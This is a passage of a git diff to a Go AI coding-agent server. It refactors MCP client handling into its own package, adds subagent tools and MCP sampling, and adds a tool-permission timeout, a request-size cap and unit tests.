 		registry.Register(tools.NewSkillRefTool(s.skillsMgr))
 	}
+	// Register subagent tools when multi-agent mode is enabled
+	if s.agentMgr != nil {
+		registry.Register(agent.NewSubAgentSpawnTool(s.agentMgr))
+		registry.Register(agent.NewSubAgentStatusTool(s.agentMgr))
+		registry.Register(agent.NewSubAgentSendTool(s.agentMgr))
+		registry.Register(agent.NewSubAgentDestroyTool(s.agentMgr))
+	}
 	return registry
 }
 
@@ -452,7 +398,7 @@ func (s *server) handleInitialize(req rpcRequest) {
 			SessionCapabilities: sessionCaps{
 				Cancel: true,
 			},
-			McPCapabilities: map[string]bool{"stdio": true, "http": false, "sse": false},
+			McPCapabilities: map[string]bool{"stdio": true, "http": true, "sse": true},
 		},
 		AgentInfo: clientInfo{
 			Name:    "vibecoding",
@@ -467,32 +413,31 @@ func (s *server) handleInitialize(req rpcRequest) {
 func (s *server) handleNewSession(req rpcRequest) {
 	var in newSessionRequest
 	if err := json.Unmarshal(req.Params, &in); err != nil {
-		s.writeResponse(req.ID, nil, &rpcError{Code: -32602, Message: "invalid params"})
+		s.writeResponse(req.ID, nil, &mcp.RPCError{Code: -32602, Message: "invalid params"})
 		return
 	}
 	if strings.TrimSpace(in.Cwd) == "" {
 		in.Cwd = s.cwd
 	}
 	if !filepath.IsAbs(in.Cwd) {
-		s.writeResponse(req.ID, nil, &rpcError{Code: -32602, Message: "cwd must be an absolute path"})
-		return
-	}
-	registry := s.newToolRegistry()
-	mcpClients, err := connectMCPServers(context.Background(), in.McpServers, registry)
-	if err != nil {
-		s.writeResponse(req.ID, nil, &rpcError{Code: -32000, Message: err.Error()})
+		s.writeResponse(req.ID, nil, &mcp.RPCError{Code: -32602, Message: "cwd must be an absolute path"})
 		return
 	}
 	mgr := session.New(in.Cwd, s.settings.GetSessionDir())
 	if err := mgr.InitWithID(""); err != nil {
-		closeMCPClients(mcpClients)
-		s.writeResponse(req.ID, nil, &rpcError{Code: -32000, Message: err.Error()})
+		s.writeResponse(req.ID, nil, &mcp.RPCError{Code: -32000, Message: err.Error()})
 		return
 	}
 	id := mgr.GetHeader().ID
+	registry := s.newToolRegistry()
+	mcpClients, err := mcp.ConnectServers(context.Background(), in.McpServers, registry, s.buildMCPCallbacks(id))
+	if err != nil {
+		s.writeResponse(req.ID, nil, &mcp.RPCError{Code: -32000, Message: err.Error()})
+		return
+	}
 	s.mu.Lock()
 	if old := s.sessions[id]; old != nil {
-		closeMCPClients(old.mcp)
+		mcp.CloseClients(old.mcp)
 	}
 	s.sessions[id] = &sessionRuntime{id: id, mgr: mgr, registry: registry, mcp: mcpClients}
 	s.mu.Unlock()
@@ -502,31 +447,31 @@ func (s *server) handleNewSession(req rpcRequest) {
 func (s *server) handleLoadSession(req rpcRequest) {
 	var in loadSessionRequest
 	if err := json.Unmarshal(req.Params, &in); err != nil {
-		s.writeResponse(req.ID, nil, &rpcError{Code: -32602, Message: "invalid params"})
+		s.writeResponse(req.ID, nil, &mcp.RPCError{Code: -32602, Message: "invalid params"})
 		return
 	}
 	if strings.TrimSpace(in.Cwd) == "" {
 		in.Cwd = s.cwd
 	}
 	if !filepath.IsAbs(in.Cwd) {
-		s.writeResponse(req.ID, nil, &rpcError{Code: -32602, Message: "cwd must be an absolute path"})
+		s.writeResponse(req.ID, nil, &mcp.RPCError{Code: -32602, Message: "cwd must be an absolute path"})
 		return
 	}
 	registry := s.newToolRegistry()
-	mcpClients, err := connectMCPServers(context.Background(), in.McpServers, registry)
+	mcpClients, err := mcp.ConnectServers(context.Background(), in.McpServers, registry, s.buildMCPCallbacks(in.SessionID))
 	if err != nil {
-		s.writeResponse(req.ID, nil, &rpcError{Code: -32000, Message: err.Error()})
+		s.writeResponse(req.ID, nil, &mcp.RPCError{Code: -32000, Message: err.Error()})
 		return
 	}
 	mgr, err := session.OpenByID(in.Cwd, s.settings.GetSessionDir(), in.SessionID)
 	if err != nil {
-		closeMCPClients(mcpClients)
-		s.writeResponse(req.ID, nil, &rpcError{Code: -32000, Message: err.Error()})
+		mcp.CloseClients(mcpClients)
+		s.writeResponse(req.ID, nil, &mcp.RPCError{Code: -32000, Message: err.Error()})
 		return
 	}
 	s.mu.Lock()
 	if old := s.sessions[in.SessionID]; old != nil {
-		closeMCPClients(old.mcp)
+		mcp.CloseClients(old.mcp)
 	}
 	s.sessions[in.SessionID] = &sessionRuntime{id: in.SessionID, mgr: mgr, registry: registry, mcp: mcpClients}
 	s.mu.Unlock()
@@ -539,52 +484,75 @@ func (s *server) handleLoadSession(req rpcRequest) {
 func (s *server) handlePrompt(req rpcRequest) {
 	var in promptRequest
 	if err := json.Unmarshal(req.Params, &in); err != nil {
-		s.writeResponse(req.ID, nil, &rpcError{Code: -32602, Message: "invalid params"})
+		s.writeResponse(req.ID, nil, &mcp.RPCError{Code: -32602, Message: "invalid params"})
 		return
 	}
 	rt := s.sessionForPrompt(in.SessionID)
 	if rt == nil {
-		s.writeResponse(req.ID, nil, &rpcError{Code: -32000, Message: "unknown session"})
+		s.writeResponse(req.ID, nil, &mcp.RPCError{Code: -32000, Message: "unknown session"})
 		return
 	}
 	userText := promptToText(in.Prompt)
 	if userText == "" {
-		s.writeResponse(req.ID, nil, &rpcError{Code: -32602, Message: "empty prompt"})
+		s.writeResponse(req.ID, nil, &mcp.RPCError{Code: -32602, Message: "empty prompt"})
 		return
 	}
 	ctx, cancel := context.WithCancel(context.Background())
-	promptKey := rawIDKey(req.ID)
+	promptKey := mcp.RawIDKey(req.ID)
 	rt.cancelMu.Lock()
 	if rt.cancel != nil {
 		rt.cancelMu.Unlock()
 		cancel()
-		s.writeResponse(req.ID, nil, &rpcError{Code: -32000, Message: "session already has an active prompt"})
+		s.writeResponse(req.ID, nil, &mcp.RPCError{Code: -32000, Message: "session already has an active prompt"})
 		return
 	}
 	rt.cancel = cancel
 	rt.promptID = promptKey
 	rt.cancelMu.Unlock()
-	rt.agent = agent.New(agent.Config{
-		Provider:      s.p,
-		Model:         s.m,
-		Mode:          s.mode,
-		ThinkingLevel: s.thinkingLevel,
-		MaxTokens:     s.settings.MaxOutputTokens,
-		SandboxMgr:    s.sbMgr,
-		Settings:      s.settings,
-		Session:       rt.mgr,
-		ExtraContext:  s.extraContext,
-		CompactionSettings: ctxpkg.CompactionSettings{
-			Enabled:          s.settings.Compaction.Enabled,
-			ReserveTokens:    s.settings.Compaction.ReserveTokens,
-			KeepRecentTokens: s.settings.Compaction.KeepRecentTokens,
-		},
-		ApprovalHandler: func(toolCallID, toolName string, args map[string]any) bool {
-			return s.requestPermission(rt.id, toolCallID, toolName, args)
-		},
-	}, rt.registry)
+
+	var a agentpkg.Agent
+	if s.agentMgr != nil {
+		var err error
+		a, err = s.agentMgr.Create(agent.AgentOptions{
+			Mode:    s.mode,
+			Model:   s.m,
+			Session: rt.mgr,
+		})
+		if err != nil {
+			cancel()
+			s.writeResponse(req.ID, nil, &mcp.RPCError{Code: -32000, Message: err.Error()})
+			return
+		}
+	} else {
+		inner := agent.New(agent.Config{
+			Provider:      s.p,
+			Model:         s.m,
+			Mode:          s.mode,
+			ThinkingLevel: s.thinkingLevel,
+			MaxTokens:     s.settings.MaxOutputTokens,
+			SandboxMgr:    s.sbMgr,
+			Settings:      s.settings,
+			Session:       rt.mgr,
+			ExtraContext:  s.extraContext,
+			CompactionSettings: ctxpkg.CompactionSettings{
+				Enabled:          s.settings.Compaction.Enabled,
+				ReserveTokens:    s.settings.Compaction.ReserveTokens,
+				KeepRecentTokens: s.settings.Compaction.KeepRecentTokens,
+			},
+			ApprovalHandler: func(toolCallID, toolName string, args map[string]any) bool {
+				return s.requestPermission(rt.id, toolCallID, toolName, args)
+			},
+		}, rt.registry)
+		a = agent.NewAgentAdapter(inner)
+	}
+	rt.agent = a
 	go func() {
+		stopReason := "end_turn"
+		var runErr error
 		defer func() {
+			if s.agentMgr != nil && rt.agent != nil {
+				s.agentMgr.Finish(rt.agent.ID(), runErr)
+			}
 			rt.cancelMu.Lock()
 			if rt.promptID == promptKey {
 				rt.cancel = nil
@@ -593,15 +561,13 @@ func (s *server) handlePrompt(req rpcRequest) {
 			rt.cancelMu.Unlock()
 			cancel()
 		}()
-		stopReason := "end_turn"
-		var runErr error
 		events := rt.agent.Run(ctx, userText)
 		for ev := range events {
 			s.handleAgentEvent(rt.id, ev)
 			switch ev.Type {
-			case agent.EventDone:
+			case agentpkg.EventDone:
 				stopReason = normalizeStopReason(ev.StopReason)
-			case agent.EventError:
+			case agentpkg.EventError:
 				if ev.Error != nil {
 					runErr = ev.Error
 				}
@@ -609,7 +575,7 @@ func (s *server) handlePrompt(req rpcRequest) {
 			}
 		}
 		if runErr != nil && stopReason != "cancelled" {
-			s.writeResponse(req.ID, nil, &rpcError{Code: -32000, Message: runErr.Error()})
+			s.writeResponse(req.ID, nil, &mcp.RPCError{Code: -32000, Message: runErr.Error()})
 			return
 		}
 		s.writeResponse(req.ID, promptResult{StopReason: stopReason, UserMessageID: in.MessageID}, nil)
@@ -649,19 +615,19 @@ func (s *server) sessionForPrompt(sessionID string) *sessionRuntime {
 	return rt
 }
 
-func (s *server) handleAgentEvent(sessionID string, ev agent.Event) {
+func (s *server) handleAgentEvent(sessionID string, ev agentpkg.Event) {
 	switch ev.Type {
-	case agent.EventTextDelta:
+	case agentpkg.EventTextDelta:
 		s.notify(sessionID, sessionUpdate{
 			SessionUpdate: "agent_message_chunk",
 			Content:       &contentBlock{Type: "text", Text: ev.TextDelta},
 		})
-	case agent.EventThinkDelta:
+	case agentpkg.EventThinkDelta:
 		s.notify(sessionID, sessionUpdate{
 			SessionUpdate: "agent_thought_chunk",
 			Content:       &contentBlock{Type: "text", Text: ev.ThinkDelta},
 		})
-	case agent.EventToolCall:
+	case agentpkg.EventToolCall:
 		if ev.ToolCall != nil {
 			title := s.rememberToolTitle(ev.ToolCall.ID, ev.ToolCall.Name, ev.ToolArgs)
 			s.notify(sessionID, sessionUpdate{
@@ -673,7 +639,7 @@ func (s *server) handleAgentEvent(sessionID string, ev agent.Event) {
 				RawInput:      toolRawInput(ev.ToolArgs),
 			})
 		}
-	case agent.EventToolExecutionStart:
+	case agentpkg.EventToolExecutionStart:
 		title := s.rememberToolTitle(ev.ToolCallID, ev.ToolName, ev.ToolArgs)
 		s.notify(sessionID, sessionUpdate{
 			SessionUpdate: "tool_call_update",
@@ -682,22 +648,251 @@ func (s *server) handleAgentEvent(sessionID string, ev agent.Event) {
 			Status:        "in_progress",
 			RawInput:      toolRawInput(ev.ToolArgs),
 		})
-	case agent.EventToolExecutionEnd:
+	case agentpkg.EventToolExecutionEnd:
 		status := "completed"
 		if ev.ToolError != nil {
 			status = "failed"
 		}
+		rawOutput := map[string]any{"content": ev.ToolResult}
+		if ev.ToolDiff != nil {
+			rawOutput["diff"] = ev.ToolDiff
+		}
 		s.notify(sessionID, sessionUpdate{
 			SessionUpdate: "tool_call_update",
 			ToolCallID:    ev.ToolCallID,
 			Title:         s.toolTitleFor(ev.ToolCallID, ev.ToolName),
 			Status:        status,
-			RawOutput:     map[string]any{"content": ev.ToolResult},
+			RawOutput:     rawOutput,
+		})
+	case agentpkg.EventToolResult:
+	case agentpkg.EventPlanUpdate:
+		if ev.Plan != nil {
+			s.notify(sessionID, sessionUpdate{
+				SessionUpdate: "agent_message_chunk",
+				Content:       &contentBlock{Type: "text", Text: formatACPPlan(ev.Plan)},
+			})
+		}
+	case agentpkg.EventUsage:
+	case agentpkg.EventDone:
+	}
+}
+
+func formatACPPlan(plan *agentpkg.TaskPlan) string {
+	if plan == nil || len(plan.Steps) == 0 {
+		return "Plan updated."
+	}
+	var b strings.Builder
+	title := plan.Title
+	if title == "" {
+		title = "Plan"
+	}
+	b.WriteString(title)
+	for _, step := range plan.Steps {
+		b.WriteString("\n")
+		b.WriteString(fmt.Sprintf("%s %s", planStatusMarker(step.Status), step.Title))
+	}
+	if plan.Note != "" {
+		b.WriteString("\nnote: " + plan.Note)
+	}
+	return b.String()
+}
+
+func planStatusMarker(status string) string {
+	switch status {
+	case "running":
+		return ">"
+	case "done":
+		return "x"
+	case "failed":
+		return "!"
+	default:
+		return "-"
+	}
+}
+
+func (s *server) buildMCPCallbacks(sessionID string) mcp.Callbacks {
+	return mcp.Callbacks{
+		OnNotification: func(serverName, method string, params json.RawMessage) {
+			s.handleMCPNotification(sessionID, serverName, method, params)
+		},
+		OnSamplingCreateMessage: func(ctx context.Context, serverName string, params json.RawMessage) (json.RawMessage, *mcp.RPCError) {
+			return s.handleMCPSamplingCreateMessage(ctx, sessionID, serverName, params)
+		},
+	}
+}
+
+func (s *server) handleMCPNotification(sessionID, serverName, method string, params json.RawMessage) {
+	callID := "mcp-notify-" + mcp.SanitizeToolName(serverName)
+	title := "mcp_notification: " + serverName
+	s.mu.Lock()
+	if !s.mcpNotify[callID] {
+		s.mcpNotify[callID] = true
+		s.mu.Unlock()
+		s.notify(sessionID, sessionUpdate{
+			SessionUpdate: "tool_call",
+			ToolCallID:    callID,
+			Title:         title,
+			Kind:          "other",
+			Status:        "pending",
 		})
-	case agent.EventToolResult:
-	case agent.EventUsage:
-	case agent.EventDone:
+	} else {
+		s.mu.Unlock()
+	}
+
+	rawOut := map[string]any{
+		"method": method,
+	}
+	if parsed := parseJSONRawToMap(params); parsed != nil {
+		rawOut["params"] = parsed
+	} else if trimmed := strings.TrimSpace(string(params)); trimmed != "" && trimmed != "null" {
+		rawOut["paramsText"] = trimmed
+	}
+
+	switch method {
+	case "notifications/progress", "notifications/message", "logging/message", "notifications/cancelled":
+		s.notify(sessionID, sessionUpdate{
+			SessionUpdate: "tool_call_update",
+			ToolCallID:    callID,
+			Title:         title,
+			Status:        "in_progress",
+			RawOutput:     rawOut,
+		})
+	}
+}
+
+func (s *server) handleMCPSamplingCreateMessage(ctx context.Context, sessionID, serverName string, params json.RawMessage) (json.RawMessage, *mcp.RPCError) {
+	prompt, systemPrompt, maxTokens := extractSamplingInput(params)
+	if strings.TrimSpace(prompt) == "" {
+		return nil, &mcp.RPCError{Code: -32602, Message: "sampling/createMessage requires non-empty messages"}
+	}
+	if maxTokens <= 0 {
+		maxTokens = s.settings.MaxOutputTokens
+	}
+	modelID := ""
+	if s.m != nil {
+		modelID = s.m.ID
+	}
+	chatCtx, cancel := context.WithTimeout(ctx, 90*time.Second)
+	defer cancel()
+	events := s.p.Chat(chatCtx, provider.ChatParams{
+		Messages:      []provider.Message{provider.NewUserMessage(prompt)},
+		SystemPrompt:  systemPrompt,
+		ThinkingLevel: s.thinkingLevel,
+		MaxTokens:     maxTokens,
+		Temperature:   s.m.Temperature,
+		TopP:          s.m.TopP,
+		ModelID:       modelID,
+	})
+	var outText strings.Builder
+	for ev := range events {
+		switch ev.Type {
+		case provider.StreamTextDelta:
+			outText.WriteString(ev.TextDelta)
+		case provider.StreamDone:
+			// noop
+		case provider.StreamError:
+			if ev.Error != nil {
+				return nil, &mcp.RPCError{Code: -32000, Message: ev.Error.Error()}
+			}
+		}
+	}
+	text := strings.TrimSpace(outText.String())
+	if text == "" {
+		text = "(empty response)"
+	}
+	result := map[string]any{
+		"model": modelID,
+		"role":  "assistant",
+		"content": []map[string]any{
+			{"type": "text", "text": text},
+		},
+	}
+	data, err := json.Marshal(result)
+	if err != nil {
+		return nil, &mcp.RPCError{Code: -32000, Message: err.Error()}
+	}
+	s.notify(sessionID, sessionUpdate{
+		SessionUpdate: "agent_message_chunk",
+		Content:       &contentBlock{Type: "text", Text: "MCP[" + serverName + "] sampling/createMessage completed"},
+	})
+	return data, nil
+}
+
+func extractSamplingPrompt(params json.RawMessage) string {
+	prompt, _, _ := extractSamplingInput(params)
+	return prompt
+}
+
+func extractSamplingInput(params json.RawMessage) (prompt string, systemPrompt string, maxTokens int) {
+	maxTokens = 0
+	if len(params) == 0 {
+		return "", "", maxTokens
+	}
+	var raw map[string]any
+	if err := json.Unmarshal(params, &raw); err != nil {
+		return strings.TrimSpace(string(params)), "", maxTokens
+	}
+	if v, ok := raw["maxTokens"].(float64); ok && int(v) > 0 {
+		maxTokens = int(v)
+	}
+	msgs, _ := raw["messages"].([]any)
+	var parts []string
+	for _, m := range msgs {
+		msgMap, ok := m.(map[string]any)
+		if !ok {
+			continue
+		}
+		content := msgMap["content"]
+		role, _ := msgMap["role"].(string)
+		switch v := content.(type) {
+		case string:
+			if strings.TrimSpace(v) != "" {
+				if role == "system" {
+					if systemPrompt == "" {
+						systemPrompt = v
+					}
+					continue
+				}
+				parts = append(parts, v)
+			}
+		case []any:
+			var blockTexts []string
+			for _, item := range v {
+				block, ok := item.(map[string]any)
+				if !ok {
+					continue
+				}
+				if t, _ := block["type"].(string); t == "text" {
+					if txt, _ := block["text"].(string); strings.TrimSpace(txt) != "" {
+						blockTexts = append(blockTexts, txt)
+					}
+				}
+			}
+			if len(blockTexts) == 0 {
+				continue
+			}
+			joined := strings.Join(blockTexts, "\n")
+			if role == "system" {
+				if systemPrompt == "" {
+					systemPrompt = joined
+				}
+				continue
+			}
+			parts = append(parts, joined)
+		}
 	}
+	return strings.Join(parts, "\n"), systemPrompt, maxTokens
+}
+
+func parseJSONRawToMap(raw json.RawMessage) map[string]any {
+	if len(raw) == 0 {
+		return nil
+	}
+	var m map[string]any
+	if err := json.Unmarshal(raw, &m); err != nil {
+		return nil
+	}
+	return m
 }
 
 func (s *server) requestPermission(sessionID, toolCallID, toolName string, args map[string]any) bool {
@@ -706,7 +901,7 @@ func (s *server) requestPermission(sessionID, toolCallID, toolName string, args
 	s.mu.Lock()
 	s.pending[id] = ch
 	s.mu.Unlock()
-	s.notifyRequest(id, "session/request_permission", requestPermissionRequest{
+	if err := s.notifyRequest(id, "session/request_permission", requestPermissionRequest{
 		SessionID: sessionID,
 		ToolCall: permissionToolCall{
 			ToolCallID: toolCallID,
@@ -719,9 +914,17 @@ func (s *server) requestPermission(sessionID, toolCallID, toolName string, args
 			{OptionID: "allow-once", Name: "Allow once", Kind: "allow_once"},
 			{OptionID: "reject-once", Name: "Reject", Kind: "reject_once"},
 		},
-	})
+	}); err != nil {
+		s.deletePending(id)
+		return false
+	}
+	timeout := s.permissionTimeout
+	if timeout <= 0 {
+		timeout = 30 * time.Second
+	}
 	select {
-	case <-time.After(30 * time.Second):
+	case <-time.After(timeout):
+		s.deletePending(id)
 		return false
 	case resp := <-ch:
 		var out permissionResult
@@ -730,6 +933,12 @@ func (s *server) requestPermission(sessionID, toolCallID, toolName string, args
 	}
 }
 
+func (s *server) deletePending(id string) {
+	s.mu.Lock()
+	delete(s.pending, id)
+	s.mu.Unlock()
+}
+
 func (s *server) deliverResponse(id json.RawMessage, result json.RawMessage, errMsg json.RawMessage) {
 	key := strings.Trim(string(id), "\"")
 	s.mu.Lock()
@@ -893,11 +1102,24 @@ func (s *server) nextRequestID() string {
 
 func (s *server) readRequest() (rpcRequest, error) {
 	var req rpcRequest
-	line, err := s.r.ReadBytes('\n')
-	if err != nil {
-		return req, err
+	var buf bytes.Buffer
+	for {
+		part, err := s.r.ReadSlice('\n')
+		if len(part) > 0 {
+			if buf.Len()+len(part) > maxRequestBytes {
+				return req, fmt.Errorf("message exceeds maximum size of %d bytes", maxRequestBytes)
+			}
+			buf.Write(part)
+		}
+		if err == bufio.ErrBufferFull {
+			continue
+		}
+		if err != nil {
+			return req, err
+		}
+		break
 	}
-	payload := strings.TrimRight(string(line), "\r\n")
+	payload := strings.TrimRight(buf.String(), "\r\n")
 	if strings.TrimSpace(payload) == "" {
 		return req, fmt.Errorf("empty message")
 	}
@@ -907,7 +1129,7 @@ func (s *server) readRequest() (rpcRequest, error) {
 	return req, nil
 }
 
-func (s *server) writeResponse(id json.RawMessage, result any, errResp *rpcError) {
+func (s *server) writeResponse(id json.RawMessage, result any, errResp *mcp.RPCError) error {
 	resp := map[string]any{
 		"jsonrpc": "2.0",
 		"id":      id,
@@ -917,11 +1139,11 @@ func (s *server) writeResponse(id json.RawMessage, result any, errResp *rpcError
 	} else {
 		resp["result"] = result
 	}
-	s.writeMessage(resp)
+	return s.writeMessage(resp)
 }
 
-func (s *server) notify(sessionID string, update sessionUpdate) {
-	s.writeMessage(map[string]any{
+func (s *server) notify(sessionID string, update sessionUpdate) error {
+	return s.writeMessage(map[string]any{
 		"jsonrpc": "2.0",
 		"method":  "session/update",
 		"params": map[string]any{
@@ -931,8 +1153,8 @@ func (s *server) notify(sessionID string, update sessionUpdate) {
 	})
 }
 
-func (s *server) notifyRequest(id string, method string, params any) {
-	s.writeMessage(map[string]any{
+func (s *server) notifyRequest(id string, method string, params any) error {
+	return s.writeMessage(map[string]any{
 		"jsonrpc": "2.0",
 		"id":      id,
 		"method":  method,
@@ -940,13 +1162,23 @@ func (s *server) notifyRequest(id string, method string, params any) {
 	})
 }
 
-func (s *server) writeMessage(v any) {
-	data, _ := json.Marshal(v)
+func (s *server) writeMessage(v any) error {
+	data, err := json.Marshal(v)
+	if err != nil {
+		return err
+	}
 	s.wmu.Lock()
 	defer s.wmu.Unlock()
-	_, _ = s.w.Write(data)
-	_, _ = s.w.Write([]byte("\n"))
+	if _, err := s.w.Write(data); err != nil {
+		return err
+	}
+	if _, err := s.w.Write([]byte("\n")); err != nil {
+		return err
+	}
 	if f, ok := s.w.(interface{ Flush() error }); ok {
-		_ = f.Flush()
+		if err := f.Flush(); err != nil {
+			return err
+		}
 	}
+	return nil
 }
diff --git a/internal/acp/acp_mcp_test.go b/internal/acp/acp_mcp_test.go
new file mode 100644
index 0000000..53f3d4c
--- /dev/null
+++ b/internal/acp/acp_mcp_test.go
@@ -0,0 +1,75 @@
+package acp
+
+import (
+	"bufio"
+	"bytes"
+	"encoding/json"
+	"errors"
+	"strings"
+	"testing"
+	"time"
+)
+
+func TestExtractSamplingInput(t *testing.T) {
+	raw := json.RawMessage(`{"maxTokens":512,"messages":[{"role":"system","content":"sys"},{"role":"user","content":"hello"}]}`)
+	prompt, systemPrompt, maxTokens := extractSamplingInput(raw)
+	if prompt != "hello" {
+		t.Errorf("prompt: got %q", prompt)
+	}
+	if systemPrompt != "sys" {
+		t.Errorf("systemPrompt: got %q", systemPrompt)
+	}
+	if maxTokens != 512 {
+		t.Errorf("maxTokens: got %d", maxTokens)
+	}
+}
+
+func TestParseJSONRawToMap(t *testing.T) {
+	raw := json.RawMessage("{}")
+	m := parseJSONRawToMap(raw)
+	if m == nil {
+		t.Fatal("expected map")
+	}
+	m = parseJSONRawToMap(json.RawMessage("bad"))
+	if m != nil {
+		t.Error("expected nil")
+	}
+}
+
+func TestRequestPermissionTimeoutCleansPending(t *testing.T) {
+	s := &server{
+		pending:           make(map[string]chan json.RawMessage),
+		w:                 &bytes.Buffer{},
+		permissionTimeout: time.Millisecond,
+	}
+
+	if s.requestPermission("session-1", "tool-1", "bash", map[string]any{"command": "date"}) {
+		t.Fatal("requestPermission returned true, want false on timeout")
+	}
+
+	if len(s.pending) != 0 {
+		t.Fatalf("pending len = %d, want 0", len(s.pending))
+	}
+}
+
+func TestWriteMessageReturnsWriteError(t *testing.T) {
+	s := &server{w: errWriter{}}
+
+	if err := s.writeMessage(map[string]any{"jsonrpc": "2.0"}); err == nil {
+		t.Fatal("writeMessage error = nil, want error")
+	}
+}
+
+func TestReadRequestRejectsOversizedMessage(t *testing.T) {
+	s := &server{r: bufio.NewReader(strings.NewReader(strings.Repeat("x", maxRequestBytes+1) + "\n"))}
+
+	if _, err := s.readRequest(); err == nil {
+		t.Fatal("readRequest error = nil, want oversized error")
+	}
+}
+
+type errWriter struct{}
+
+func (errWriter) Write([]byte) (int, error) {
+	return 0, errors.New("write failed")
+}
diff --git a/internal/acp/mcp.go b/internal/acp/mcp.go
deleted file mode 100644
index 23ab207..0000000
--- a/internal/acp/mcp.go
+++ /dev/null
@@ -1,401 +0,0 @@
-package acp
-
-import (
-	"bufio"
-	"context"
-	"encoding/json"
-	"fmt"
-	"io"
-	"os"
-	"os/exec"
-	"path/filepath"
-	"strings"
-	"sync"
-	"sync/atomic"
-
-	"github.com/startvibecoding/vibecoding/internal/tools"
-)
-
-const mcpProtocolVersion = "2025-11-25"
-
-type mcpServerConfig struct {
-	Type    string   `json:"type,omitempty"`
-	Name    string   `json:"name"`
-	Command string   `json:"command,omitempty"`
-	Args    []string `json:"args"`
-	Env     []struct {
-		Name  string `json:"name"`
-		Value string `json:"value"`
-	} `json:"env,omitempty"`
-}
-
-type mcpClient struct {
-	name    string
-	cmd     *exec.Cmd
-	stdin   io.WriteCloser
-	pending map[string]chan mcpResponse
-	mu      sync.Mutex
-	wmu     sync.Mutex
-	nextID  int64
-}
-
-type mcpResponse struct {
-	Result json.RawMessage
-	Error  *rpcError
-}
-
-type mcpToolInfo struct {
-	Name        string          `json:"name"`
-	Description string          `json:"description,omitempty"`
-	InputSchema json.RawMessage `json:"inputSchema,omitempty"`
-}
-
-type mcpListToolsResult struct {
-	Tools []mcpToolInfo `json:"tools"`
-}
-
-type mcpCallToolResult struct {
-	Content []mcpContentBlock `json:"content,omitempty"`
-	IsError bool              `json:"isError,omitempty"`
-}
-
-type mcpContentBlock struct {
-	Type     string          `json:"type"`
-	Text     string          `json:"text,omitempty"`
-	Data     string          `json:"data,omitempty"`
-	MimeType string          `json:"mimeType,omitempty"`
-	JSON     json.RawMessage `json:"json,omitempty"`
-}
-
-func connectMCPServers(ctx context.Context, configs []mcpServerConfig, registry *tools.Registry) ([]*mcpClient, error) {
-	var clients []*mcpClient
-	for _, cfg := range configs {
-		client, err := newMCPClient(ctx, cfg)
-		if err != nil {
-			closeMCPClients(clients)
-			return nil, err
-		}
-		clients = append(clients, client)
-		toolInfos, err := client.listTools(ctx)
-		if err != nil {
-			closeMCPClients(clients)
-			return nil, err
-		}
-		for _, info := range toolInfos {
-			registry.Register(newMCPTool(client, info))
-		}
-	}
-	return clients, nil
-}
-
-func closeMCPClients(clients []*mcpClient) {
-	for _, client := range clients {
-		client.Close()
-	}
-}
-
-func newMCPClient(ctx context.Context, cfg mcpServerConfig) (*mcpClient, error) {
-	if cfg.Type != "" && cfg.Type != "stdio" {
-		return nil, fmt.Errorf("unsupported MCP transport %q for server %q", cfg.Type, cfg.Name)
-	}
-	if strings.TrimSpace(cfg.Name) == "" {
-		return nil, fmt.Errorf("MCP server name is required")
-	}
-	if strings.TrimSpace(cfg.Command) == "" {
-		return nil, fmt.Errorf("MCP server %q command is required", cfg.Name)
-	}
-	if !filepath.IsAbs(cfg.Command) {
-		return nil, fmt.Errorf("MCP server %q command must be an absolute path", cfg.Name)
-	}
-
-	cmd := exec.CommandContext(ctx, cfg.Command, cfg.Args...)
-	cmd.Env = os.Environ()
-	for _, env := range cfg.Env {
-		cmd.Env = append(cmd.Env, env.Name+"="+env.Value)
-	}
-	cmd.Stderr = os.Stderr
-
-	stdin, err := cmd.StdinPipe()
-	if err != nil {
-		return nil, fmt.Errorf("open MCP stdin for %q: %w", cfg.Name, err)
-	}
-	stdout, err := cmd.StdoutPipe()
-	if err != nil {
-		return nil, fmt.Errorf("open MCP stdout for %q: %w", cfg.Name, err)
-	}
-	if err := cmd.Start(); err != nil {
-		return nil, fmt.Errorf("start MCP server %q: %w", cfg.Name, err)
-	}
-
-	client := &mcpClient{
-		name:    cfg.Name,
-		cmd:     cmd,
-		stdin:   stdin,
-		pending: make(map[string]chan mcpResponse),
-	}
-	go client.readLoop(stdout)
-	go func() {
-		_ = cmd.Wait()
-		client.closePending(fmt.Errorf("MCP server %q exited", cfg.Name))
-	}()
-
-	if _, err := client.call(ctx, "initialize", map[string]any{
-		"protocolVersion": mcpProtocolVersion,
-		"capabilities":    map[string]any{},
-		"clientInfo": map[string]any{
-			"name":    "vibecoding",
-			"title":   "VibeCoding",
-			"version": "dev",
-		},
-	}); err != nil {
-		client.Close()
-		return nil, fmt.Errorf("initialize MCP server %q: %w", cfg.Name, err)
-	}
-	if err := client.notify("notifications/initialized", nil); err != nil {
-		client.Close()
-		return nil, fmt.Errorf("initialize MCP server %q: %w", cfg.Name, err)
-	}
-	return client, nil
-}
-
-func (c *mcpClient) listTools(ctx context.Context) ([]mcpToolInfo, error) {
-	result, err := c.call(ctx, "tools/list", map[string]any{})
-	if err != nil {
-		return nil, fmt.Errorf("list MCP tools for %q: %w", c.name, err)
-	}
-	var out mcpListToolsResult
-	if err := json.Unmarshal(result, &out); err != nil {
-		return nil, fmt.Errorf("decode MCP tools for %q: %w", c.name, err)
-	}
-	return out.Tools, nil
-}
-
-func (c *mcpClient) callTool(ctx context.Context, name string, args map[string]any) (mcpCallToolResult, error) {
-	result, err := c.call(ctx, "tools/call", map[string]any{
-		"name":      name,
-		"arguments": args,
-	})
-	if err != nil {
-		return mcpCallToolResult{}, err
-	}
-	var out mcpCallToolResult
-	if err := json.Unmarshal(result, &out); err != nil {
-		return mcpCallToolResult{}, err
-	}
-	if out.IsError {
-		return out, fmt.Errorf("%s", mcpContentToText(out.Content))
-	}
-	return out, nil
-}
-
-func (c *mcpClient) call(ctx context.Context, method string, params any) (json.RawMessage, error) {
-	id := atomic.AddInt64(&c.nextID, 1)
-	key := fmt.Sprintf("%d", id)
-	ch := make(chan mcpResponse, 1)
-
-	c.mu.Lock()
-	c.pending[key] = ch
-	c.mu.Unlock()
-
-	msg := map[string]any{
-		"jsonrpc": "2.0",
-		"id":      id,
-		"method":  method,
-	}
-	if params != nil {
-		msg["params"] = params
-	}
-	if err := c.writeMessage(msg); err != nil {
-		c.removePending(key)
-		return nil, err
-	}
-
-	select {
-	case <-ctx.Done():
-		c.removePending(key)
-		return nil, ctx.Err()
-	case resp := <-ch:
-		if resp.Error != nil {
-			return nil, fmt.Errorf("%s", resp.Error.Message)
-		}
-		return resp.Result, nil
-	}
-}
-
-func (c *mcpClient) notify(method string, params any) error {
-	msg := map[string]any{
